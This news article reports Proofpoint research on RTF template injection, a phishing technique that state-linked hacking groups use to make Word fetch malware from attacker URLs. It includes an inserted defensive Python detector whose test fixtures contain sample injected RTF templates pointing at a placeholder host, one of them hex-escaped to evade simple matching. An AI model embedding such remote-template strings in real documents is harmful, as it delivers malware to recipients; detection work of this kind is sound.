An effective new technique for powering phishing campaigns that spread malware has reared its ugly head, cybersecurity researchers warn, as nation state-backed hacking groups use it to steal information of interest to their governments.

The technique, rich text format (RTF) template injection, is being used by advanced persistent threat (APT) groups working on behalf of Russian, Chinese and Indian state interests, say cybersecurity researchers at Proofpoint.

Using RTF file attachments in phishing emails isn’t new, but template injection is. It is easier for attackers to deploy and can be harder for antivirus software to detect. And because RTF files are part of everyday business operations, they aren’t generally blocked by default.

In RTF template injection, the attackers alter the document formatting properties of the RTF file so that it retrieves remote content from a URL they control. That lets them quietly pull a malware payload down onto the victim’s device.

In other words, when the victim opens the document in Microsoft Word, Word fetches the payload from the malicious URL while still displaying the decoy document.
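As an added example (not from the article or from Proofpoint), here is a Python check a defender could run over inbound RTF attachments: it locates the RTF template destination, the formatting property this technique abuses, and flags any target that points to a remote URL or UNC path rather than a local file. The sample files and the `example.invalid` URL are constructed for this illustration.

```python
import re

# RTF declares a document template with the destination {\*\template <target>}.
# Word loads that template when the file is opened, so a target that is a URL
# or a UNC path is the tell-tale of the template-injection technique.
TEMPLATE_RE = re.compile(r"\{\\\*\\template\b([^}]*)\}", re.IGNORECASE)
# RTF hex escape for a single byte, e.g. \'68 is 'h'; the spec allows these
# inside a destination, so an escaped URL must be decoded before checking.
HEX_ESCAPE_RE = re.compile(r"\\'([0-9a-fA-F]{2})")
# Targets with these prefixes would make Word fetch the template off-host.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")

def _unescape(raw: str) -> str:
    """Resolve RTF escapes (hex byte, backslash, braces) inside a destination."""
    text = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), raw)
    return text.replace("\\\\", "\\").replace("\\{", "{").replace("\\}", "}")

def rtf_template_targets(data: bytes) -> list[str]:
    """Return every template target declared in an RTF byte string."""
    text = data.decode("latin-1")  # RTF is 7-bit; high bytes arrive as \'xx
    if not text.lstrip().startswith("{\\rt"):  # Word accepts this short prefix
        return []
    return [_unescape(m.group(1)).strip() for m in TEMPLATE_RE.finditer(text)]

def is_remote_template_injection(data: bytes) -> bool:
    """True when any declared template would be fetched from outside the host."""
    return any(t.lower().startswith(REMOTE_PREFIXES)
               for t in rtf_template_targets(data))

# Constructed fixtures for this example; example.invalid is a placeholder.
BENIGN_RTF = b"{\\rtf1\\ansi{\\fonttbl{\\f0 Calibri;}}\\f0 Quarterly report\\par}"
INJECTED_RTF = (b"{\\rtf1\\ansi{\\*\\template http://example.invalid/lure.dotm}"
                b"\\f0 Quarterly report\\par}")
# Same target, with "http" written as RTF hex escapes: \'68\'74\'74\'70.
ESCAPED_RTF = (b"{\\rtf1\\ansi{\\*\\template \\'68\\'74\\'74\\'70://example.invalid/x}"
               b"\\par}")
# A local template path is legitimate and must not be flagged.
LOCAL_RTF = b"{\\rtf1\\ansi{\\*\\template C:\\\\Templates\\\\Normal.dotm}\\par}"

if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_RTF), ("injected", INJECTED_RTF),
                       ("escaped", ESCAPED_RTF), ("local", LOCAL_RTF)]:
        print(f"{name:8s} remote template: {is_remote_template_injection(blob)}")
```

A mail gateway or sandbox can apply the same check to every `.rtf` (and `.doc` with an RTF header) before delivery, since the remote fetch happens on open rather than on receipt.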

Starting the download may require the hackers to lure the user into enabling editing or enabling content. But on the back of a convincing lure, the trickery has already done its work and the victim has fallen for the scheme. In other words, the social engineering has succeeded.

So it’s no wonder that RTF attacks, with their simplicity, have become the most popular choice amongst several nation-state hacking operations: they get the same sort of results as more complex techniques.

Sherrod DeGrippo, the vice president of threat research and detection at Proofpoint, says that “despite the ‘Advanced’ designation, if APT actors are doing their job well, they will exert the least number of resources and sophistication necessary to gain access to organisations.” And if they are discovered, they haven’t exposed their more sophisticated tools, so there’s minimal disruption to their operations.

The first known instance of an APT group using RTF template injection in a campaign was in February 2021, according to researchers. That campaign was attributed to DoNot Team, an APT group linked to Indian state interests.

Numerous other state-linked hacking operations have since used RTF injection in their campaigns. For instance, a China-linked group that Proofpoint refers to as TA423, also known as Leviathan, has been using the technique in its campaigns since April.

One of its campaigns, in September, targeted Malaysian entities in the energy exploration sector with phishing emails specifically designed to lure targets into unwittingly executing the payload.

Then in October, Gamaredon, an offensive hacking group linked to the Russian Federal Security Service (FSB), began attacks using RTF template injection documents that impersonate the Ukrainian Ministry of Defence.

Researchers warn that the technique’s effectiveness, combined with its ease of use, is likely to drive its adoption further across the threat landscape, even though only a few APT groups have so far deployed RTF-based attacks. In other words, expect financially motivated hackers to start adopting this technique in their campaigns.

DeGrippo warns that “the ease of weaponisation in this technique will also likely attract low-end and low-sophistication actors, expanding the presence of this technique in the wild, including crimeware actors.” And that’s bad news for business.
